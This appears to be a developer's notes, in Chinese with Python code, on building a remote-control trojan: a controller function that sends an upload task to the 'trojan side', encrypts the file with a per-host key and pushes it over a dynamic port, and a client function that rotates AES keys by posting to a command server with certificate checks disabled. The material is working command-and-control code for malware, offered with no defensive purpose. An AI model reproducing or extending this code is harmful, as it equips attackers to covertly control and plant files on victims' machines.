动态端口由控制端主动申请 因为任务下发主要是控制端在做
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| def uploadfile(self, host_key: str, filepath: str, targetfilepath: str): self.sync_keys() if not exists(filepath.strip()): print("文件不存在!") return -1 if targetfilepath.strip()[-1] != "/": targetfilepath += "/"
random_port = self.openfileserver() if not random_port: print("文件服务开启失败!") return -1
self.sendcmd(host_key, "uploadfile", port=random_port) print("发布任务!\n正在等待木马端连接...") sleep(2)
s = socket.socket() s.connect((LOCAL_IP, random_port)) s.send("c".encode("utf-8"))
encrypted_filepath = filepath + ".enc" try: with open(filepath, "rb") as original_file: original_data = original_file.read() encrypted_data = FileCrypto.encrypt(original_data, host_key) with open(encrypted_filepath, "wb") as encrypted_file: encrypted_file.write(encrypted_data) print(f"文件加密完成,保存路径:{encrypted_filepath}") except Exception as e: print(f"文件加密失败:{e}") s.close() return -1
filename = basename(encrypted_filepath) filesize = getsize(encrypted_filepath)
while True: data = s.recv(1024) if data: isok = loads(data.decode("utf-8")) break if isinstance(isok, dict) and isok.get("info") == "yes": print("对接成功!正在上传加密文件...") filehead = {"filename": filename, "filesize": filesize, "filewritedir": targetfilepath} s.send(dumps({"whoami": "c", "data": str(b64encode(dumps(filehead).encode("utf-8")))}).encode("utf-8")) sleep(1) data = {"whoami": "c", "data": "senddata"} s.send(dumps(data).encode("utf-8"))
with open(encrypted_filepath, "rb") as fp: while filesize > 0: chunk = fp.read(1024) filesize -= len(chunk) s.sendall(chunk) if filesize == 0: print("加密文件上传完成!") break
while True: data = s.recv(1024) if data: data = data.decode("utf-8") if data == "exit": print("文件上传成功!") break
s.send(dumps({"whoami": "exit"}).encode("utf-8")) s.close()
try: from os import remove remove(encrypted_filepath) print(f"临时加密文件已删除:{encrypted_filepath}") except Exception as e: print(f"删除加密文件失败:{e}")
return 0
动态密钥由被控端主动发起 每隔一段时间都需要主动更新密钥 用初始密钥加密当前更新后的密钥后发送给服务端 服务端更新任务密钥等信息 同时控制端代码也需要更新 在每次操作之前都获取被控端的最新密钥
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| def update_aes_key(self, key: str, aes_key: str) -> str: """ 描述: 客户端生成新的 AES 密钥并告知服务端。
参数: key: 当前客户端的唯一标识。 aes_key: 当前 AES 加密密钥。
返回: 更新成功返回新 AES 密钥,失败返回 "error"。 """ try: new_aes_key = md5((str((randint(1, 65535))) + "pkcn").encode("utf-8")).hexdigest()[:16] signature = DataAesCrypt(aes_key, key).encrypt()
url = "https://" + IP + ":" + str(PORT) + "/updatekey" payload = { "key": key, "new_aes_key": new_aes_key, "signature": signature } rst = post(url=url, json=payload, timeout=5, verify=False) if rst.status_code == 200: print("AES 密钥更新成功!") return new_aes_key else: print("AES 密钥更新失败:", rst.text) return "error" except Exception as e: print(f"更新 AES 密钥时发生错误:{e}") return "error"
尝试进行流式加密发现太麻烦了 直接将文件整个加密成新文件之后传输新文件
sockets 代理